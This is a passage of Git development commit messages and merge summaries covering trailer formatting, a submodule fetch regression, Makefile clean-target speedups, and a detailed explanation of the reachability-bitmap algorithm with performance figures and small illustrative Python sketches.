well as "separator". All the other existing options on the pretty.c
path had tests where they were the only option provided. I'm also
keeping a sanity test for "%(trailers:)" being the same as
"%(trailers)". There's no reason to suspect it wouldn't be in the
current implementation, but let's keep it in the interest of black box
testing.
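
The shape of the bug can be modeled in a few lines of Python. This is a simplified sketch, not the code in format_trailer_info(): TrailerOptions holds a hypothetical subset of the options, unfolding itself is not implemented, and the check_value_only parameter exists only to switch between the buggy and the fixed check.

```python
from dataclasses import dataclass


@dataclass
class TrailerOptions:
    # Hypothetical, simplified subset of the real options.
    only_trailers: bool = False
    unfold: bool = False
    value_only: bool = False


def format_trailers(block, opts, check_value_only=True):
    """Format a raw trailer block; check_value_only=False mimics the bug."""
    untouched = not opts.only_trailers and not opts.unfold
    if check_value_only:
        untouched = untouched and not opts.value_only
    if untouched:
        return block    # fast path: copy the block verbatim
    lines = []
    for line in block.splitlines():
        key, sep, value = line.partition(": ")
        lines.append(value if opts.value_only and sep else line)
    return "\n".join(lines) + "\n"
```

With only value_only set, the buggy check takes the fast path and returns the block unchanged. Combining value_only with another option such as unfold avoids the fast path, which is consistent with the tests not catching the problem.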
1. https://lore.kernel.org/git/pull.726.git.1599335291.gitgitgadget@gmail.com/
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Change the documentation for the various %(trailers) options so it
isn't repeating part of the documentation for "only" about how boolean
values are handled. Instead, let's split the description of that into
general documentation at the top.
It then suffices to refer to it by listing the options as
"opt[=<BOOL>]". I'm also changing it to upper-case "[=<BOOL>]" from
"[=val]" for consistency with "<SEP>".
It took me a couple of readings to realize that these options were
referring back to the "only" option's treatment of boolean
values.
Signed-off-by: Ævar Arnfjörð Bjarmason <avarab@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A regression has been introduced by a62387b (submodule.c: fetch in
submodules git directory instead of in worktree, 2018-11-28).
The scenario in which it triggers is when one has a repository with a
submodule inside a submodule like this:
superproject/middle_repo/inner_repo
Persons A and B both have a clone of it, but Person B is not working
with the inner_repo and thus does not have it initialized in his working
copy.
Now person A introduces a change to the inner_repo and propagates it
through the middle_repo and the superproject.
Once person A has pushed the changes and person B wants to fetch them
using "git fetch" at the superproject level, B's git call will return
with an error saying:
Could not access submodule 'inner_repo'
Errors during submodule fetch:
middle_repo
The expectation is that in this case the inner submodule will be
recognized as an uninitialized submodule and skipped by the git fetch
command.
This used to work correctly before 'a62387b (submodule.c: fetch in
submodules git directory instead of in worktree, 2018-11-28)'.
Starting with a62387b the code wants to evaluate "is_empty_dir()" inside
.git/modules for a directory only existing in the worktree, which of
course delivers the wrong return value.
This patch ensures is_empty_dir() is getting the correct path of the
uninitialized submodule by concatenation of the actual worktree and the
name of the uninitialized submodule.
The first attempt to fix this regression, in 1b7ac4e6d4 (submodules:
fix of regression on fetching of non-init subsub-repo, 2020-11-12), by
simply reverting a62387b, resulted in an infinite loop of submodule
fetches in the simpler case of a recursive fetch of a superproject with
uninitialized submodules, and so this commit was reverted in 7091499bc0
(Revert "submodules: fix of regression on fetching of non-init
subsub-repo", 2020-12-02).
To prevent future breakages, also add a regression test for this
scenario.
Signed-off-by: Peter Kaestle <peter.kaestle@nokia.com>
CC: Junio C Hamano <gitster@pobox.com>
CC: Philippe Blain <levraiphilippeblain@gmail.com>
CC: Ralf Thielow <ralf.thielow@gmail.com>
CC: Eric Sunshine <sunshine@sunshineco.us>
Reviewed-by: Philippe Blain <levraiphilippeblain@gmail.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'dist' target uses a versioned temp directory, $(GIT_TARNAME), into
which it copies various files added to the distribution tarball. Should
it be necessary to remove this directory in the 'clean' target, since
the name depends on $(GIT_VERSION), the current HEAD must be positioned
on the same commit as when 'make dist' was issued. Otherwise, the target
will fail to remove that directory.
Create a '.dist-tmp-dir' directory and copy the various files into this
now un-versioned directory while creating the distribution tarball. Change
the 'clean' target to remove the '.dist-tmp-dir' directory, instead of the
version dependent $(GIT_TARNAME) directory.
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'clean' target includes code to remove an '*.tar.gz' file that
was the by-product of a debian build. This was originally added by
commit 5a571cdd8a (Clean generated files a bit more, to cope with
Debian build droppings., 2005-08-12). However, all support for the
'debian build' was dropped by commit 7d0e65b892 (Retire debian/
directory., 2006-01-06), which seems to have simply forgotten to
remove the 'git-core_$(GIT_VERSION)-*.tar.gz' from the 'clean'
target. Remove it now.
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'clean' target is still noticeably slow on cygwin, despite the
improvements made by previous patches. For example, the second
invocation of 'make clean' below:
$ make clean >/dev/null 2>&1
$ make clean
...
make[1]: Entering directory '/home/ramsay/git/gitweb'
make[2]: Entering directory '/home/ramsay/git'
make[2]: 'GIT-VERSION-FILE' is up to date.
make[2]: Leaving directory '/home/ramsay/git'
...
$
has been timed at 10.361s on my laptop (an old core i5-4200M @ 2.50GHz,
8GB RAM, 1TB HDD).
Notice that the 'clean' target is making a nested call to the parent
Makefile to ensure that the GIT-VERSION-FILE is up-to-date. This is to
ensure that the $(GIT_VERSION) make variable is set, once that file had
been included. However, the 'clean' target does not use the $(GIT_VERSION)
variable, directly or indirectly, so it does not have any effect on what
the target removes. Therefore, the time spent on ensuring an up to date
GIT-VERSION-FILE is wasted effort.
In order to eliminate such wasted effort, use the value of the internal
$(MAKECMDGOALS) variable to only '-include ../GIT-VERSION-FILE' when the
target is not 'clean'. (This drops the time down to 8.430s, on my laptop,
giving an improvement of 18.64%).
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'clean' target is still noticeably slow on cygwin, despite the
substantial improvement made by the previous patch. For example, the
second invocation of 'make clean' below:
$ make clean >/dev/null 2>&1
$ make clean
...
make[1]: Entering directory '/home/ramsay/git/Documentation'
make[2]: Entering directory '/home/ramsay/git'
make[2]: 'GIT-VERSION-FILE' is up to date.
make[2]: Leaving directory '/home/ramsay/git'
...
$
has been timed at 12.364s on my laptop (an old core i5-4200M @ 2.50GHz,
8GB RAM, 1TB HDD).
Notice that the 'clean' target is making a nested call to the parent
Makefile to ensure that the GIT-VERSION-FILE is up-to-date (prior to
the previous patch, there would have been _two_ such invocations).
This is to ensure that the $(GIT_VERSION) make variable is set, once
that file had been included. However, the 'clean' target does not use
the $(GIT_VERSION) variable, directly or indirectly, so it does not
have any effect on what the target removes. Therefore, the time spent
on ensuring an up to date GIT-VERSION-FILE is wasted effort.
In order to eliminate such wasted effort, use the value of the internal
$(MAKECMDGOALS) variable to only '-include ../GIT-VERSION-FILE' when the
target is not 'clean'. (This drops the time down to 10.361s, on my laptop,
giving an improvement of 16.20%).
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The 'clean' target is noticeably slow on cygwin, even for a 'do-nothing'
invocation of 'make clean'. For example, the second 'make clean' below:
$ make clean >/dev/null 2>&1
$ make clean
GIT_VERSION = 2.29.0
...
make[1]: Entering directory '/home/ramsay/git/Documentation'
GEN mergetools-list.made
GEN cmd-list.made
GEN doc.dep
...
$
has been timed at 23.339s, using git v2.29.0, on my laptop (an old core
i5-4200M @ 2.50GHz, 8GB RAM, 1TB HDD).
Notice that, since the 'doc.dep' file does not exist, make takes the
time (about 8s) to generate several files in order to create the doc.dep
include file. (If an 'include' file is missing, but a target for the
said file is present in the Makefile, make will execute that target
and, if that file now exists, throw away all its internal data and
re-read and re-parse the Makefile). Having spent the time to include
the 'doc.dep' file, the 'clean' target immediately deletes those files.
The document dependencies specified in the 'doc.dep' include file,
expressed as make targets and prerequisites, do not affect what the
'clean' target removes. Therefore, the time spent in generating the
dependencies is completely wasted effort.
In order to eliminate such wasted effort, use the value of the internal
$(MAKECMDGOALS) variable to only '-include doc.dep' when the target is
not 'clean'. (This drops the time down to 12.364s, on my laptop, giving
an improvement of 47.02%).
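
For reference, the improvement figures quoted in these 'clean' target messages follow from the usual relative-reduction formula. The Python sketch below only restates that arithmetic using the timings given in the text; improvement_percent() is a hypothetical helper name.

```python
def improvement_percent(before, after):
    """Relative reduction in runtime, as a percentage of the original time."""
    return (before - after) / before * 100.0


# Timings (in seconds) quoted for the successive 'make clean' patches.
doc_dep_patch = improvement_percent(23.339, 12.364)
documentation_patch = improvement_percent(12.364, 10.361)
gitweb_patch = improvement_percent(10.361, 8.430)
```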
Signed-off-by: Ramsay Jones <ramsay@ramsayjones.plus.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
"git imap-send" used to ignore configuration variables like
core.askpass; this has been corrected.
* nm/imap-send-use-default-config:
imap-send: parse default git config
Non-reentrant time-related library functions and ctime/asctime with
awkward calling interfaces are banned from the codebase.
* jk/banned:
banned.h: mark ctime_r() and asctime_r() as banned
banned.h: mark non-reentrant gmtime, etc as banned
"git maintenance run/start/stop" needed to be run in a repository
to hold the lockfile they use, but didn't make sure they are
actually in a repository, which has been corrected.
* rs/maintenance-run-outside-repo:
t7900: fix typo: "test_execpt_success"
maintenance: fix SEGFAULT when no repository
"fetch-pack" could pass NULL pointer to unlink(2) when it sees an
invalid filename; the error checking has been tightened to make
this impossible.
* rs/fetch-pack-invalid-lockfile:
fetch-pack: disregard invalid pack lockfiles
Code clean-up.
* ma/grep-init-default:
MyFirstObjectWalk: drop `init_walken_defaults()`
grep: copy struct in one fell swoop
grep: use designated initializers for `grep_defaults`
grep: don't set up a "default" repo for grep
The transport layer was taught to optionally exchange the session
ID assigned by the trace2 subsystem during fetch/push transactions.
* js/trace2-session-id:
receive-pack: log received client session ID
send-pack: advertise session ID in capabilities
upload-pack, serve: log received client session ID
fetch-pack: advertise session ID in capabilities
transport: log received server session ID
serve: advertise session ID in v2 capabilities
receive-pack: advertise session ID in v0 capabilities
upload-pack: advertise session ID in v0 capabilities
trace2: add a public function for getting the SID
docs: new transfer.advertiseSID option
docs: new capability to advertise session IDs
"git apply" adjusted the permission bits of working-tree files and
directories according to the core.sharedRepository setting by mistake and
for a long time, which has been corrected.
* mt/do-not-use-scld-in-working-tree:
apply: don't use core.sharedRepository to create working tree files
"git maintenance" command had trouble working in a directory whose
pathname contained an ERE metacharacter like '+'.
* ds/maintenance-part-3:
maintenance: use 'git config --fixed-value'
Various subcommands of "git config" that take value_regex
learn the "--fixed-value" option to take the value_regex option
as a literal string.
* ds/config-literal-value:
config doc: value-pattern is not necessarily a regexp
config: implement --fixed-value with --get*
config: plumb --fixed-value into config API
config: add --fixed-value option, un-implemented
t1300: add test for --replace-all with value-pattern
t1300: test "set all" mode with value-pattern
config: replace 'value_regex' with 'value_pattern'
config: convert multi_replace to flags
Processes that access packdata while the .idx file gets removed
(e.g. while repacking) did not fail or fall back gracefully as they
could.
* tb/idx-midx-race-fix:
midx.c: protect against disappearing packs
packfile.c: protect against disappearing indexes
"git update-ref --stdin" learns to take multiple transactions in a
single session.
* ps/update-ref-multi-transaction:
update-ref: disallow "start" for ongoing transactions
p1400: use `git-update-ref --stdin` to test multiple transactions
update-ref: allow creation of multiple transactions
t1400: avoid touching refs on filesystem
"git add -i" failed to honor custom colors configured to show
patches, which has been corrected.
* js/add-i-color-fix:
add -i: verify in the tests that colors can be overridden
add -p: prefer color.diff.context over color.diff.plain
add -i (Perl version): color header to match the C version
add -i (built-in): use the same indentation as the Perl version
add -p (built-in): do not color the progress indicator separately
add -i (built-in): use correct names to load color.diff.* config
add -i (built-in): prevent the `reset` "color" from being configured
add -i: use `reset_color` consistently
add -p (built-in): imitate `xdl_format_hunk_hdr()` generating hunk headers
add -i (built-in): send error messages to stderr
add -i (built-in): do show an error message for incorrect inputs
If the old bitmap file contains a bitmap for a given commit, then that
commit does not need help from intermediate commits in its history to
compute its final bitmap. Eject that commit from the walk and insert it
into a separate list of reusable commits that are eventually stored in
the list of commits for computing bitmaps.
This helps the repeat bitmap computation task, even if the selected
commits shift drastically. This helps when a previously-bitmapped commit
exists in the first-parent history of a newly-selected commit. Since we
stop the walk at these commits and we use a first-parent walk, it is
harder to walk "around" these bitmapped commits. It's not impossible,
but we can greatly reduce the computation time for many selected
commits.
           |   runtime (sec)    |   peak heap (GB)   |
           |                    |                    |
           |   from  |   with   |   from  |   with   |
           | scratch | existing | scratch | existing |
-----------+---------+----------+---------+-----------
last patch |  88.478 |   53.218 |   2.157 |    2.224 |
this patch |  86.681 |   16.164 |   2.157 |    2.222 |
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The previous commits improved the bitmap computation process for very
long, linear histories with many refs by removing quadratic growth in
how many objects were walked. The strategy of computing "intermediate
commits" using bitmasks for which refs can reach those commits
partitioned the poset of reachable objects so each part could be walked
exactly once. This was effective for linear histories.
However, there was a (significant) drawback: wide histories with many
refs had an explosion of memory costs to compute the commit bitmasks
during the exploration that discovers these intermediate commits. Since
these wide histories are unlikely to repeat walking objects, the cost
of walking objects multiple times was not significant before. But now, the
commit walk *before computing bitmaps* is incredibly expensive.
In an effort to discover a happy medium, this change reduces the walk
for intermediate commits to only the first-parent history. This focuses
the walk on how the histories converge, which still has significant
reduction in repeat object walks. It is still possible to create
quadratic behavior in this version, but it is probably less likely in
realistic data shapes.
Here is some data taken on a fresh clone of the kernel:
           |   runtime (sec)    |   peak heap (GB)   |
           |                    |                    |
           |   from  |   with   |   from  |   with   |
           | scratch | existing | scratch | existing |
-----------+---------+----------+---------+----------
  original |  64.044 |   83.241 |   2.088 |    2.194 |
last patch |  45.049 |   37.624 |   2.267 |    2.334 |
this patch |  88.478 |   53.218 |   2.157 |    2.224 |
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
When constructing new bitmaps, we perform a commit and tree walk in
fill_bitmap_commit() and fill_bitmap_tree(). This walk would benefit
from using existing bitmaps when available. We must track the existing
bitmaps and translate them into the new object order, but this is
generally faster than parsing trees.
In fill_bitmap_commit(), we must reorder things somewhat. The priority
queue walks commits from newest-to-oldest, which means we correctly stop
walking when reaching a commit with a bitmap. However, if we walk trees
interleaved with the commits, then we might be parsing trees that are
actually part of a re-used bitmap. To avoid over-walking trees, add them
to a LIFO queue and walk them after exploring commits completely.
On git.git, this reduces a second immediate bitmap computation from 2.0s
to 1.0s. On linux.git, we go from 32s to 22s. On chromium's fork
network, we go from 227s to 198s.
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
'find_objects()' currently needs to interact with the bitmaps khash
pretty closely. To make 'find_objects()' read a little more
straightforwardly, remove some of the khash-level details into a new
function that describes what it does: 'add_commit_to_bitmap()'.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
A couple of callers within pack-bitmap.c duplicate logic to look up a
given object id in the bitmaps khash. Factor this out into a new
function, 'bitmap_for_commit()' to reduce some code duplication.
Make this new function non-static, since it will be used in later
commits from outside of pack-bitmap.c.
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The on-disk bitmap format has a flag to mark a bitmap to be "reused".
This is a rather curious feature, and works like this:
- a run of pack-objects would decide to mark the last 80% of the
bitmaps it generates with the reuse flag
- the next time we generate bitmaps, we'd see those reuse flags from
the last run, and mark those commits as special:
- we'd be more likely to select those commits to get bitmaps in
the new output
- when generating the bitmap for a selected commit, we'd reuse the
old bitmap as-is (rearranging the bits to match the new pack, of
course)
However, neither of these behaviors particularly makes sense.
Just because a commit happened to be bitmapped last time does not make
it a good candidate for having a bitmap this time. In particular, we may
choose bitmaps based on how recent they are in history, or whether a ref
tip points to them, and those things will change. We're better off
re-considering fresh which commits are good candidates.
Reusing the existing bitmap _is_ a reasonable thing to do to save
computation. But only reusing exact bitmaps is a weak form of this. If
we have an old bitmap for A and now want a new bitmap for its child, we
should be able to compute that only by looking at trees that are new
to the child. But this code would consider only exact reuse (which is
perhaps why it was eager to select those commits in the first place).
Furthermore, the recent switch to the reverse-edge algorithm for
generating bitmaps dropped this optimization entirely (and yet still
performs better).
So let's do a few cleanups:
- drop the whole "reusing bitmaps" phase of generating bitmaps. It's
not helping anything, and is mostly unused code (or worse, code that
is using CPU but not doing anything useful)
- drop the use of the on-disk reuse flag to select commits to bitmap
- stop setting the on-disk reuse flag in bitmaps we generate (since
nothing respects it anymore)
We will keep a few innards of the reuse code, which will help us
implement a more capable version of the "reuse" optimization:
- simplify rebuild_existing_bitmaps() into a function that only builds
the mapping of bits between the old and new orders, but doesn't
actually convert any bitmaps
- make rebuild_bitmap() public; we'll call it lazily to convert bitmaps
as we traverse (using the mapping created above)
Signed-off-by: Jeff King <peff@peff.net>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
The bitmap_writer_build() method calls bitmap_builder_init() to
construct a list of commits reachable from the selected commits along
with a "reverse graph". This reverse graph has edges pointing from a
commit to other commits that can reach that commit. After computing a
reachability bitmap for a commit, the values in that bitmap are then
copied to the reachability bitmaps across the edges in the reverse
graph.
We can now relax the role of the reverse graph to greatly reduce the
number of intermediate reachability bitmaps we compute during this
reverse walk. The end result is that we walk objects the same number of
times as before when constructing the reachability bitmaps, but we also
spend much less time copying bits between bitmaps and have much lower
memory pressure in the process.
The core idea is to select a set of "important" commits based on
interactions among the sets of commits reachable from each selected commit.
The first technical concept is to create a new 'commit_mask' member in the
bb_commit struct. Note that the selected commits are provided in an
ordered array. The first thing to do is to mark the ith bit in the
commit_mask for the ith selected commit. As we walk the commit-graph, we
copy the bits in a commit's commit_mask to its parents. At the end of
the walk, the ith bit in the commit_mask for a commit C stores a boolean
representing "The ith selected commit can reach C."
As we walk, we will discover non-selected commits that are important. We
will get into this later, but those important commits must also receive
bit positions, growing the width of the bitmasks as we walk. At the true
end of the walk, the ith bit means "the ith _important_ commit can reach
C."
MAXIMAL COMMITS
---------------
We use a new 'maximal' bit in the bb_commit struct to represent whether
a commit is important or not. The term "maximal" comes from the
partially-ordered set of commits in the commit-graph where C >= P if P
is a parent of C, and then extending the relationship transitively.
Instead of taking the maximal commits across the entire commit-graph, we
instead focus on selecting each commit that is maximal among commits
with the same bits on in their commit_mask. This definition is
important, so let's consider an example.
Suppose we have three selected commits A, B, and C. These are assigned
bitmasks 100, 010, and 001 to start. Each of these can be marked as
maximal immediately because they each will be the uniquely maximal
commit that contains their own bit. Keep in mind that these commits
may have different bitmasks after the walk; for example, if B can reach
C but A cannot, then the final bitmask for C is 011. Even in these
cases, C would still be a maximal commit among all commits with the
third bit on in their masks.
Now define sets X, Y, and Z to be the sets of commits reachable from A,
B, and C, respectively. The intersections of these sets correspond to
different bitmasks:
* 100: X - (Y union Z)
* 010: Y - (X union Z)
* 001: Z - (X union Y)
* 110: (X intersect Y) - Z
* 101: (X intersect Z) - Y
* 011: (Y intersect Z) - X
* 111: X intersect Y intersect Z
This can be visualized with the following Hasse diagram:
    100    010    001
     | \  /   \  / |
     |  \/     \/  |
     |  /\     /\  |
     | /  \   /  \ |
    110    101    011
      \___  |  ___/
          \ | /
           111
Some of these bitmasks may not be represented, depending on the topology
of the commit-graph. In fact, we are counting on it, since the number of
possible bitmasks is exponential in the number of selected commits, but
is also limited by the total number of commits. In practice, very few
bitmasks are possible because most commits converge on a common "trunk"
in the commit history.
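As a rough illustration of the three-commit example above, the following
Python sketch propagates commit masks from children to parents over a
small made-up history and reports each commit's final bitmask. The graph,
the extra commits D, E, and F, and the function name are assumptions for
illustration only; masks are plain integers here, not Git's bitmap type.

```python
# Hypothetical history: each commit maps to its list of parents.
PARENTS = {
    "A": ["D"],
    "B": ["D", "E"],
    "C": ["E"],
    "D": ["F"],
    "E": ["F"],
    "F": [],
}
# Children appear before their parents, as in a topo-order walk.
TOPO_ORDER = ["A", "B", "C", "D", "E", "F"]
SELECTED = ["A", "B", "C"]


def propagate_masks(parents, topo_order, selected):
    """Return the final bitmask string of every commit in topo_order."""
    width = len(selected)
    mask = {commit: 0 for commit in topo_order}
    # The ith selected commit starts with only its own bit set
    # (A=100, B=010, C=001 for three selected commits).
    for i, commit in enumerate(selected):
        mask[commit] |= 1 << (width - 1 - i)
    # Copy each commit's bits to its parents as we walk.
    for commit in topo_order:
        for parent in parents[commit]:
            mask[parent] |= mask[commit]
    return {commit: format(mask[commit], f"0{width}b") for commit in topo_order}


masks = propagate_masks(PARENTS, TOPO_ORDER, SELECTED)
```

In this toy history D lands in the 110 class (reachable from A and B but
not C), E in 011, and F in 111, while the classes 100, 010, and 001 hold
only the selected commits themselves.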
With this three-bit example, we wish to find commits that are maximal
for each bitmask. How can we identify this as we are walking?
As we walk, we visit a commit C. Since we are walking the commits in
topo-order, we know that C is visited after all of its children are
visited. Thus, when we get C from the revision walk we inspect the
'maximal' property of its bb_data and use that to determine if C is truly
important. Its commit_mask is also nearly final. If C is not one of the
originally-selected commits, then assign a bit position to C (by
incrementing num_maximal) and set that bit on in commit_mask. See
"MULTIPLE MAXIMAL COMMITS" below for more detail on this.
Now that the commit C is known to be maximal or not, consider each
parent P of C. Compute two new values:
* c_not_p : true if and only if the commit_mask for C contains a bit
that is not contained in the commit_mask for P.
* p_not_c : true if and only if the commit_mask for P contains a bit
that is not contained in the commit_mask for C.
If c_not_p is false, then P already has all of the bits that C would
provide to its commit_mask. In this case, move on to other parents as C
has nothing to contribute to P's state that was not already provided by
other children of P.
We continue with the case that c_not_p is true. This means there are
bits in C's commit_mask to copy to P's commit_mask, so use bitmap_or()
to add those bits.
If p_not_c is also true, then set the maximal bit for P to one. This means
that if no other commit has P as a parent, then P is definitely maximal.
This is because no child had the same bitmask. It is important to think
about the maximal bit for P at this point as a temporary state: "P is
maximal based on current information."
In contrast, if p_not_c is false, then set the maximal bit for P to
zero. Further, clear all reverse_edges for P since any edges that were
previously assigned to P are no longer important. P will gain all
reverse edges based on C.
The final thing we need to do is to update the reverse edges for P.
These reverse edges represent "which closest maximal commits
contributed bits to my commit_mask?" Since C contributed bits to P's
commit_mask in this case, C must add to the reverse edges of P.
If C is maximal, then C is a 'closest' maximal commit that contributed
bits to P. Add C to P's reverse_edges list.
Otherwise, C has a list of maximal commits that contributed bits to its
bitmask (and this list has exactly one element). Add all of these items
to P's reverse_edges list. Be careful to ignore duplicates here.
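The per-parent step described above can be sketched in Python as follows.
This is only an approximation of the logic, not the C implementation: the
Node class and update_parent() are hypothetical names, and commit masks
are modeled as plain integers.

```python
from dataclasses import dataclass, field


@dataclass(eq=False)  # compare nodes by identity, like commit pointers
class Node:
    name: str
    mask: int = 0              # stands in for commit_mask
    maximal: bool = False
    reverse_edges: list = field(default_factory=list)


def update_parent(c, p):
    """Apply the effect of visiting child c to its parent p."""
    c_not_p = bool(c.mask & ~p.mask)  # c has a bit that p lacks
    p_not_c = bool(p.mask & ~c.mask)  # p has a bit that c lacks

    if not c_not_p:
        return  # c has nothing new to contribute to p

    p.mask |= c.mask

    if p_not_c:
        # No child seen so far has the same mask: maximal for now.
        p.maximal = True
    else:
        # p's mask now equals c's mask; earlier edges no longer matter.
        p.maximal = False
        p.reverse_edges.clear()

    # Closest maximal commits that contributed bits to p.
    sources = [c] if c.maximal else c.reverse_edges
    for source in sources:
        if source not in p.reverse_edges:  # ignore duplicates
            p.reverse_edges.append(source)
```

For example, with maximal commits I (mask 10) and J (mask 01) sharing a
parent M, calling update_parent(I, M) and then update_parent(J, M) leaves M
with mask 11, marked maximal, and with reverse edges to I and J.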
After inspecting all parents P for a commit C, we can clear the
commit_mask for C. This reduces the memory load to be limited to the
"width" of the commit graph.
Consider our ABC/XYZ example from earlier and let's inspect the state of
the commits for an interesting bitmask, say 011. Suppose that D is the
only maximal commit with this bitmask (in the first three bits). All
other commits with bitmask 011 have D as the only entry in their
reverse_edges list. D's reverse_edges list contains B and C.
COMPUTING REACHABILITY BITMAPS
------------------------------
Now that we have our definition, let's zoom out and consider what
happens with our new reverse graph when computing reachability bitmaps.
We walk the reverse graph in reverse-topo-order, so we visit commits
with largest commit_masks first. After we compute the reachability
bitmap for a commit C, we push the bits in that bitmap to each commit D
in the reverse edge list for C. Then, when we finally visit D we already
have the bits for everything reachable from maximal commits that D can
reach and we only need to walk the objects in the set-difference.
In our ABC/XYZ example, when we finally walk for the commit A we only
need to walk commits with bitmask equal to A's bitmask. If that bitmask
is 100, then we are only walking commits in X - (Y union Z) because the
bitmap already contains the bits for objects reachable from (X intersect
Y) union (X intersect Z) (i.e. the bits from the reachability bitmaps
for the maximal commits with bitmasks 110 and 101).
The behavior is intended to walk each commit (and the trees that commit
introduces) at most once while allocating and copying fewer reachability
bitmaps. There is one caveat: what happens when there are multiple
maximal commits with the same bitmask, with respect to the initial set
of selected commits?
MULTIPLE MAXIMAL COMMITS
------------------------
Earlier, we mentioned that when we discover a new maximal commit, we
assign a new bit position to that commit and set that bit position to
one for that commit. This is absolutely important for interesting
commit-graphs such as git/git and torvalds/linux. The reason is due to
the existence of "butterflies" in the commit-graph partial order.
Here is an example of four commits forming a butterfly:
    I    J
    |\  /|
    | \/ |
    | /\ |
    |/  \|
    M    N
     \  /
      |/
      Q
Here, I and J both have parents M and N. In general, these do not need
to be exact parent relationships, but reachability relationships. The
most important part is that M and N cannot reach each other, so they are
independent in the partial order. If I had commit_mask 10 and J had
commit_mask 01, then M and N would both be assigned commit_mask 11 and
be maximal commits with the bitmask 11. Then, what happens when M and N
can both reach a commit Q? If Q is also assigned the bitmask 11, then it
is not maximal but is reachable from both M and N.
While this is not necessarily a deal-breaker for our abstract definition
of finding maximal commits according to a given bitmask, we have a few
issues that can come up in our larger picture of constructing
reachability bitmaps.
In particular, if we do not also consider Q to be a "maximal" commit,
then we will walk commits reachable from Q twice: once when computing
the reachability bitmap for M and another time when computing the
reachability bitmap for N. This becomes much worse if the topology
continues this pattern with multiple butterflies.
The solution has already been mentioned: each of M and N are assigned
their own bits to the bitmask and hence they become uniquely maximal for
their bitmasks. Finally, Q also becomes maximal and thus we do not need
to walk its commits multiple times. The final bitmasks for these commits
are as follows:
I:10 J:01
|\ /|
| \ _____/ |
| /\____ |
|/ \ |
M:111 N:1101
\ /
Q:1111
Further, Q's reverse edge list is { M, N }, while M and N both have
reverse edge list { I, J }.
PERFORMANCE MEASUREMENTS
------------------------
Now that we've spent a LOT of time on the theory of this algorithm,
let's show that this is actually worth all that effort.
To test the performance, use GIT_TRACE2_PERF=1 when running
'git repack -abd' in a repository with no existing reachability bitmaps.
This avoids any issues with keeping existing bitmaps to skew the
numbers.
Inspect the "building_bitmaps_total" region in the trace2 output to
focus on the portion of work that is affected by this change. Here are
the performance comparisons for a few repositories. The timings are for
the following versions of Git: "multi" is the timing from before any
reverse graph is constructed, where we might perform multiple
traversals. "reverse" is for the previous change where the reverse graph
has every reachable commit. Finally "maximal" is the version introduced
here where the reverse graph only contains the maximal commits.
Repository: git/git
multi: 2.628 sec
reverse: 2.344 sec
maximal: 2.047 sec
Repository: torvalds/linux
multi: 64.7 sec
reverse: 205.3 sec
maximal: 44.7 sec
So we've not only recovered any time lost to switching to the
reverse-edge algorithm, but we come out ahead of "multi" in all
cases. Likewise, peak heap has gone back to something reasonable:
Repository: torvalds/linux
multi: 2.087 GB
reverse: 3.141 GB
maximal: 2.288 GB
While I do not have access to full fork networks on GitHub, Peff has run
this algorithm on the chromium/chromium fork network and reported a
change from 3 hours to ~233 seconds. That network is particularly
beneficial for this approach because it has a long, linear history along
with many tags. The "multi" approach was obviously quadratic and the new
approach is linear.
Helped-by: Jeff King <peff@peff.net>
Signed-off-by: Derrick Stolee <dstolee@microsoft.com>
Helped-by: Johannes Schindelin <Johannes.Schindelin@gmx.de>
Signed-off-by: Taylor Blau <me@ttaylorr.com>
Signed-off-by: Junio C Hamano <gitster@pobox.com>
Before 'load_bitmap_entries_v1()' reads an actual EWAH bitmap, it should
check that it can safely do so by ensuring that there are at least 6
bytes available to be read (four for the commit's index position, and
then two more for the xor offset and flags, respectively).
Likewise, it should check that the commit index it read refers to a
legitimate object in the pack.
The first fix catches a truncation bug that was exposed when testing,
and the second is purely precautionary.
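The two checks can be sketched in Python as below. This is a minimal
illustration, assuming the entry layout described above (a big-endian
32-bit commit index position followed by two single bytes); the function
name, its arguments, and the error messages are hypothetical.

```python
import struct

# 4 bytes for the commit's index position, 1 for the xor offset, 1 for flags.
ENTRY_HEADER_LEN = 6


def read_entry_header(buf, pos, num_objects):
    """Read one entry header from buf at pos, refusing to read past the end."""
    if len(buf) - pos < ENTRY_HEADER_LEN:
        raise ValueError("truncated bitmap entry header")

    commit_idx_pos, xor_offset, flags = struct.unpack_from(">IBB", buf, pos)

    # Precautionary: the position must name an object that is in the pack.
    if commit_idx_pos >= num_objects:
        raise ValueError("commit index position out of range")

    return commit_idx_pos, xor_offset, flags, pos + ENTRY_HEADER_LEN
```

Checking the length once up front keeps the individual field reads simple,
at the cost of the magic constant mentioned in the list of possible
improvements below.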
There are some possible future improvements, not pursued here. They are:
- Computing the correct boundary of the bitmap itself in the caller
and ensuring that we don't read past it. This may or may not be
worth it, since in a truncation situation, all bets are off: (is the
trailer still there and the bitmap entries malformed, or is the
trailer truncated?). The best we can do is try to read what's there
as if it's correct data (and protect ourselves when it's obviously
bogus).
- Avoid the magic "6" by teaching read_be32() and read_u8() (both of
